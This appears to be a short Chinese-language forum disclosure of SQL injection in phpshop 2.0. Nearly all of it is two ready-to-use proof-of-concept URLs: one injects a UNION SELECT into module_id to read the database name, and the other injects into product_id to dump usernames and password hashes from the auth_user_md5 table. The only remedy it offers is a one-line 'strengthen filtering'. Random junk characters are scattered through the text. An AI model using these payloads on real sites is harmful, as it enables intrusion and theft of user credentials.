标题 : phpshop 2.0 SQL Injection Vulnerability
9 }" X8 c* j5 |1 \
/ t& r3 W# c* t' }8 t$ c! v# U6 ^作者 : By onestree
0 ~" a6 X! x3 K: u: i" P: N下载地址 : http://code.google.com/p/phpshop/downloads/list
) t6 r2 U5 ]& S, e, C8 x+ i测试地址: windows 7 / ubuntu
/ C& @( }+ x3 v$ ^ 6 z2 G1 x- A4 |, w, L0 |! }/ w+ y
' r3 L* ^" A5 H* Z; t' e
SQLi p0c:4 v- d# ^0 M$ `
) E, c4 `: C8 I X==================4 [% b4 t0 W) y+ T
$ i, p7 R2 V" b" O& B) v) nhttp://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'9 l0 E3 o, i: x2 x
union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --0 l; B! j5 E# _1 o
4 ?9 ] e6 y& {6 }6 i
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
2 p. z" Q' }9 w5 Y9 R8 D. A+ m2 d, Y, h- {1 a, C. ^
修复:
4 u9 F/ [9 s( s0 E6 H2 L4 Y加强过滤. ~6 q( @& H8 s8 `4 a: ?( y
+ v; y. p) M% [
; z4 K6 { e6 m0 d/ v
|